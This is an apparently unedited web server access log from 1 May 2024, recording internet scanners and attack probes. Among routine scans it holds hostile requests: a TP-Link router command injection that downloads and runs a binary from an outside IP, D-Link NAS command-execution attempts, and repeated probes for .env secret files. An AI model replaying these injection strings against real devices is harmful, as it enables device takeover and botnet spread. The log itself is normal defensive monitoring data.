162.142.125.13 - - [01/May/2024:00:04:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.13 - - [01/May/2024:00:04:37 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.13 - - [01/May/2024:00:04:38 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
203.55.81.13 - - [01/May/2024:00:04:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:00:04:47 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:00:05:39 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:00:05:39 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
87.121.69.52 - - [01/May/2024:00:06:31 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
152.32.247.22 - - [01/May/2024:00:07:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_0_2) AppleWebKit/586.46 (KHTML, like Gecko) Chrome/107.0.1167 Safari/537.36"
152.32.247.22 - - [01/May/2024:00:07:24 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
152.32.247.22 - - [01/May/2024:00:07:25 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
152.32.247.22 - - [01/May/2024:00:07:25 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
152.32.247.22 - - [01/May/2024:00:07:25 +0200] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
152.32.247.22 - - [01/May/2024:00:07:26 +0200] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
152.32.247.22 - - [01/May/2024:00:07:27 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
94.46.246.13 - - [01/May/2024:00:10:54 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.46.246.13 - - [01/May/2024:00:10:54 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.156.69.95 - - [01/May/2024:00:12:41 +0200] "\x03" 501 316 "-" "-"
87.121.69.52 - - [01/May/2024:00:14:31 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [01/May/2024:00:15:35 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
205.210.31.245 - - [01/May/2024:00:16:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.245 - - [01/May/2024:00:16:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
84.54.51.41 - - [01/May/2024:00:20:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
87.121.69.52 - - [01/May/2024:00:23:31 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
103.245.236.120 - - [01/May/2024:00:23:55 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [01/May/2024:00:23:55 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
103.245.236.120 - - [01/May/2024:00:24:32 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [01/May/2024:00:24:32 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
94.46.246.13 - - [01/May/2024:00:25:36 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.46.246.13 - - [01/May/2024:00:25:36 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
87.121.69.52 - - [01/May/2024:00:36:17 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
198.235.24.214 - - [01/May/2024:00:37:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.214 - - [01/May/2024:00:37:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.94.138.117 - - [01/May/2024:00:37:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.117 - - [01/May/2024:00:37:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.117 - - [01/May/2024:00:37:49 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.117 - - [01/May/2024:00:37:49 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
198.235.24.152 - - [01/May/2024:00:38:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
87.121.69.52 - - [01/May/2024:00:38:45 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [01/May/2024:00:49:12 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [01/May/2024:00:51:09 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
165.227.111.8 - - [01/May/2024:00:52:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.111.8 - - [01/May/2024:00:53:00 +0200] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)"
78.153.140.179 - - [01/May/2024:00:55:56 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.179 - - [01/May/2024:00:55:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
86.38.225.237 - - [01/May/2024:00:58:04 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
86.38.225.237 - - [01/May/2024:00:58:04 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.245.236.120 - - [01/May/2024:01:02:29 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [01/May/2024:01:02:29 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
212.91.246.72 - - [01/May/2024:01:02:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
86.38.225.237 - - [01/May/2024:01:03:27 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
86.38.225.237 - - [01/May/2024:01:03:27 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/May/2024:01:03:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [01/May/2024:01:04:57 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [01/May/2024:01:04:58 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
198.235.24.77 - - [01/May/2024:01:06:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
165.227.111.8 - - [01/May/2024:01:13:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.111.8 - - [01/May/2024:01:13:40 +0200] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Linux; Android 9; rv:75.0.3770.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.67 Mobile Safari/537.36"
185.180.140.6 - - [01/May/2024:01:16:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.140.6 - - [01/May/2024:01:16:44 +0200] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
164.52.0.94 - - [01/May/2024:01:19:19 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
164.52.0.94 - - [01/May/2024:01:19:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.0.94 - - [01/May/2024:01:19:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
164.52.0.94 - - [01/May/2024:01:19:26 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.0.94 - - [01/May/2024:01:19:30 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
198.235.24.173 - - [01/May/2024:01:24:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.88.90.87 - - [01/May/2024:01:24:39 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.88.90.87 - - [01/May/2024:01:24:39 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.224.128.43 - - [01/May/2024:01:31:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.240.205.34 - - [01/May/2024:01:31:29 +0200] "Gh0st\xad" 501 321 "-" "-"
185.224.128.43 - - [01/May/2024:01:40:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
71.6.134.235 - - [01/May/2024:01:40:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
199.45.154.18 - - [01/May/2024:01:49:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
199.45.154.18 - - [01/May/2024:01:49:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.18 - - [01/May/2024:01:49:08 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
199.45.154.18 - - [01/May/2024:01:49:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
68.183.219.220 - - [01/May/2024:01:49:38 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
185.224.128.43 - - [01/May/2024:01:52:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [01/May/2024:01:52:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
71.6.134.235 - - [01/May/2024:01:56:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
138.68.106.166 - - [01/May/2024:01:57:54 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
71.6.134.235 - - [01/May/2024:01:59:24 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
185.224.128.43 - - [01/May/2024:02:07:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [01/May/2024:02:09:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [01/May/2024:02:09:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
118.26.104.179 - - [01/May/2024:02:10:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
118.26.104.179 - - [01/May/2024:02:10:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
118.26.104.179 - - [01/May/2024:02:10:29 +0200] "t3 12.1.2" 400 329 "-" "-"
203.55.81.13 - - [01/May/2024:02:11:07 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:11:09 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
185.224.128.43 - - [01/May/2024:02:12:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
103.245.236.120 - - [01/May/2024:02:12:35 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [01/May/2024:02:12:35 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
185.220.205.131 - - [01/May/2024:02:14:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
203.55.81.13 - - [01/May/2024:02:16:17 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:16:17 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:17:48 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:17:48 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
161.35.23.94 - - [01/May/2024:02:18:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
161.35.23.94 - - [01/May/2024:02:18:54 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
203.55.81.13 - - [01/May/2024:02:19:49 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:19:49 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
35.203.211.209 - - [01/May/2024:02:20:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
203.55.81.13 - - [01/May/2024:02:21:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:21:44 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:27:21 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:27:22 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
185.224.128.43 - - [01/May/2024:02:28:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
203.55.81.13 - - [01/May/2024:02:29:39 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:29:39 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:31:08 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:31:08 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:33:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:33:02 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:34:28 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.55.81.13 - - [01/May/2024:02:34:30 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64)"
54.153.30.20 - - [01/May/2024:02:37:09 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
185.224.128.43 - - [01/May/2024:02:37:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.129.48 - - [01/May/2024:02:43:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
54.184.129.237 - - [01/May/2024:02:44:44 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
146.19.24.28 - - [01/May/2024:02:47:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.240.205.34 - - [01/May/2024:02:47:51 +0200] "Gh0st\xad" 501 321 "-" "-"
103.245.236.120 - - [01/May/2024:02:50:16 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [01/May/2024:02:50:17 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
146.19.24.28 - - [01/May/2024:02:51:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
86.38.225.237 - - [01/May/2024:02:54:46 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
86.38.225.237 - - [01/May/2024:02:54:46 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.216.67.5 - - [01/May/2024:02:56:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.16.38.111 - - [01/May/2024:02:58:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
184.105.139.70 - - [01/May/2024:02:59:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
2.184.151.7 - - [01/May/2024:03:01:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
184.105.139.70 - - [01/May/2024:03:02:11 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36"
184.105.139.70 - - [01/May/2024:03:03:25 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
141.98.11.79 - - [01/May/2024:03:03:25 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
118.70.242.100 - - [01/May/2024:03:06:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
86.38.225.237 - - [01/May/2024:03:07:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
86.38.225.237 - - [01/May/2024:03:07:35 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
84.54.51.41 - - [01/May/2024:03:08:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
34.219.89.55 - - [01/May/2024:03:09:12 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
146.19.24.28 - - [01/May/2024:03:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
103.245.236.120 - - [01/May/2024:03:12:05 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
146.19.24.28 - - [01/May/2024:03:17:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
146.19.24.28 - - [01/May/2024:03:17:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
168.232.15.171 - - [01/May/2024:03:18:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
54.184.129.237 - - [01/May/2024:03:18:38 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
146.19.24.28 - - [01/May/2024:03:19:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
146.19.24.28 - - [01/May/2024:03:19:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
180.149.125.163 - - [01/May/2024:03:20:14 +0200] "GET /c/ HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
180.149.125.168 - - [01/May/2024:03:25:43 +0200] "GET /c/ HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
